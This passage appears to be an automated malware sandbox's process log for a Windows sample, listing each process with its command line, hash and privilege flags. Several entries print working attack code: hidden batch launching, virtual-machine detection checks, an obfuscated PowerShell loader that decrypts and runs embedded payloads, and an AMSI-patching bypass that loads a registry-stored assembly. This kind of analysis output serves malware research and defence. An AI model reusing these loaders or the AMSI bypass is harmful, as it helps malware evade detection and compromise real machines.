                            Commandline:C:\Windows\system32\WerFault.exe -u -p 1284 -s 2444
                            Imagebase:0x7ff79b100000
                            File size:570'736 bytes
                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:15
                            Start time:03:42:33
                            Start date:04/10/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
                            Imagebase:0x7ff7183f0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:16
                            Start time:03:42:33
                            Start date:04/10/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:17
                            Start time:03:42:33
                            Start date:04/10/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
                            Imagebase:0x7ff7183f0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:18
                            Start time:03:42:33
                            Start date:04/10/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell.exe -WindowStyle Hidden
                            Imagebase:0x7ff72bec0000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:19
                            Start time:03:42:34
                            Start date:04/10/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
                            Imagebase:0x7ff7183f0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:20
                            Start time:03:42:34
                            Start date:04/10/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:21
                            Start time:03:42:34
                            Start date:04/10/2024
                            Path:C:\Windows\System32\wbem\WMIC.exe
                            Wow64 process (32bit):false
                            Commandline:wmic diskdrive get Model
                            Imagebase:0x7ff78ee20000
                            File size:576'000 bytes
                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:22
                            Start time:03:42:34
                            Start date:04/10/2024
                            Path:C:\Windows\System32\findstr.exe
                            Wow64 process (32bit):false
                            Commandline:findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
                            Imagebase:0x7ff624f90000
                            File size:36'352 bytes
                            MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:23
                            Start time:03:42:35
                            Start date:04/10/2024
                            Path:C:\Windows\System32\wbem\WMIC.exe
                            Wow64 process (32bit):false
                            Commandline:wmic diskdrive get Manufacturer,Model
                            Imagebase:0x7ff78ee20000
                            File size:576'000 bytes
                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:24
                            Start time:03:42:35
                            Start date:04/10/2024
                            Path:C:\Windows\System32\findstr.exe
                            Wow64 process (32bit):false
                            Commandline:findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
                            Imagebase:0x7ff624f90000
                            File size:36'352 bytes
                            MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:25
                            Start time:03:42:57
                            Start date:04/10/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
                            Imagebase:0x7ff7183f0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:26
                            Start time:03:42:57
                            Start date:04/10/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell.exe -WindowStyle Hidden
                            Imagebase:0x7ff788560000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:28
                            Start time:03:43:03
                            Start date:04/10/2024
                            Path:C:\Windows\System32\WerFault.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\WerFault.exe -u -p 4828 -s 2096
                            Imagebase:0x7ff79b100000
                            File size:570'736 bytes
                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:30
                            Start time:03:43:08
                            Start date:04/10/2024
                            Path:C:\Windows\System32\WerFault.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\WerFault.exe -u -p 4828 -s 2380
                            Imagebase:0x7ff79b100000
                            File size:570'736 bytes
                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:31
                            Start time:03:43:08
                            Start date:04/10/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
                            Imagebase:0x7ff76f990000
                            File size:235'008 bytes
                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:32
                            Start time:03:43:08
                            Start date:04/10/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:33
                            Start time:03:43:11
                            Start date:04/10/2024
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                            Imagebase:0x330000
                            File size:433'152 bytes
                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:34
                            Start time:03:43:11
                            Start date:04/10/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:35
                            Start time:03:43:11
                            Start date:04/10/2024
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                            Imagebase:0x330000
                            File size:433'152 bytes
                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:36
                            Start time:03:43:11
                            Start date:04/10/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnYXVUkgpflw.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+''+'d'+'dr'+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'b'+[Char](108)+'i'+[Char](99)+','+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$crUBwWNbWsKMjsxdFIT=aMvXsEUhmbVC @([String])([IntPtr]);$CpOqYoEODudajRwpdwKjEO=aMvXsEUhmbVC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$xRGvgkyzmYH=$SWnYXVUkgpflw.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+'l'+'e'+[Char](72)+''+'a'+'nd'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+[Char](110)+''+'e'+''+[Char](108)+'3'+[Char](50)+''+'.'+''+'d'+''+[Char](108)+'l')));$PWtaGkrbiCHSQK=$AmujSZCroNXavL.Invoke($Null,@([Object]$xRGvgkyzmYH,[Object](''+'L'+''+'o'+''+[Char](97)+'d'+'L'+'ib'+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$wJqytHrusrDKQVuUA=$AmujSZCroNXavL.Invoke($Null,@([Object]$xRGvgkyzmYH,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+'u'+[Char](97)+''+[Char](108)+'P'+'r'+''+[Char](111)+''+'t'+'e'+[Char](99)+''+[Char](116)+'')));$CBvLQPx=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PWtaGkrbiCHSQK,$crUBwWNbWsKMjsxdFIT).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+'.'+'d'+''+[Char](108)+''+[Char](108)+'');$SjReXwPFwLrQCguSY=$AmujSZCroNXavL.Invoke($Null,@([Object]$CBvLQPx,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+'Sc'+'a'+'nB'+[Char](117)+'f'+'f'+''+[Char](101)+''+'r'+'')));$GtTUGmXcNy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wJqytHrusrDKQVuUA,$CpOqYoEODudajRwpdwKjEO).Invoke($SjReXwPFwLrQCguSY,[uint32]8,4,[ref]$GtTUGmXcNy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SjReXwPFwLrQCguSY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wJqytHrusrDKQVuUA,$CpOqYoEODudajRwpdwKjEO).Invoke($SjReXwPFwLrQCguSY,[uint32]8,0x20,[ref]$GtTUGmXcNy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'FT'+'W'+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](114)+''+[Char](98)+''+[Char](120)+''+[Char](45)+''+'s'+'t'+'a'+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                            Imagebase:0x7ff788560000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:37
                            Start time:03:43:11
                            Start date:04/10/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:38
                            Start time:03:43:13
                            Start date:04/10/2024
                            Path:C:\Windows\System32\dllhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0}
                            Imagebase:0x7ff70f330000
                            File size:21'312 bytes
                            MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:39
                            Start time:03:43:13
                            Start date:04/10/2024
                            Path:C:\Windows\System32\winlogon.exe
                            Wow64 process (32bit):false
                            Commandline:winlogon.exe
                            Imagebase:0x7ff7cd660000
                            File size:906'240 bytes
                            MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:40
                            Start time:03:43:13
                            Start date:04/10/2024
                            Path:C:\Windows\System32\lsass.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\lsass.exe
                            Imagebase:0x7ff7a2ae0000
                            File size:59'456 bytes
                            MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:41
                            Start time:03:43:14
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:42
                            Start time:03:43:15
                            Start date:04/10/2024
                            Path:C:\Windows\System32\dwm.exe
                            Wow64 process (32bit):false
                            Commandline:"dwm.exe"
                            Imagebase:0x7ff74e710000
                            File size:94'720 bytes
                            MD5 hash:5C27608411832C5B39BA04E33D53536C
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:43
                            Start time:03:43:16
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:44
                            Start time:03:43:17
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:45
                            Start time:03:43:17
                            Start date:04/10/2024
                            Path:C:\Windows\System32\wbem\WMIADAP.exe
                            Wow64 process (32bit):false
                            Commandline:wmiadap.exe /F /T /R
                            Imagebase:0x7ff7fb760000
                            File size:182'272 bytes
                            MD5 hash:1BFFABBD200C850E6346820E92B915DC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:46
                            Start time:03:43:17
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:47
                            Start time:03:43:18
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:48
                            Start time:03:43:18
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:49
                            Start time:03:43:20
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:50
                            Start time:03:43:20
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:51
                            Start time:03:43:20
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:52
                            Start time:03:43:21
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:53
                            Start time:03:43:22
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:54
                            Start time:03:43:23
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:55
                            Start time:03:43:23
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:56
                            Start time:03:43:24
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:57
                            Start time:03:43:25
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:58
                            Start time:03:43:25
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
